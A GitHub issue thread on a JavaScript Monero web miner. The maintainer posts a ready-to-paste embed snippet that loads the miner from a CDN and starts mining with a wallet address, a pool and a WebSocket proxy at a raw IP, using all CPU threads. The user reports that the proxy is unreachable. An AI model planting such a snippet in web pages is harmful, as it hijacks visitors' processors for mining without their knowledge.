NajmAjmal / monero-webminer

Javascript monero webminer
https://monero-webminer.vercel.app/
Apache License 2.0
78 stars 55 forks source link

what is the server ip:port #6

Closed DARK-DEVIL-66 closed 10 months ago

DARK-DEVIL-66 commented 10 months ago

how can i configer for 2xmr.com pool

NajmAjmal-old commented 10 months ago

Hi @DARK-DEVIL-66,

If you would like to use another pool, it's quite easy to change.

<!-- Start Of Mining Code (HTML) -->
<script src="https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/script.js"></script>
<script>
    server = "wss://45.119.82.33:40725";
    var pool = "gulf.moneroocean.stream:80";
    var walletAddress = "4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi";
    var workerId = "GH-XMR"
    var threads = -1;
    var password = "";
    startMining(pool, walletAddress, workerId, threads, password);
    throttleMiner = 20;
</script>
<!-- End Of Mining Code (HTML) -->

Simply change the pool url.

    var pool = "gulf.moneroocean.stream:80";

Thanks, Najm

DARK-DEVIL-66 commented 10 months ago

i changed but i get fallowing error

server = "wss://45.119.82.33:40725"; not found/reachable

DARK-DEVIL-66 commented 10 months ago

miner proxy not reachable

NajmAjmal-old commented 10 months ago

Hi @DARK-DEVIL-66,

On this website, you can find a list of other proxies you can use if the current one is not working for you.

Thanks, Najm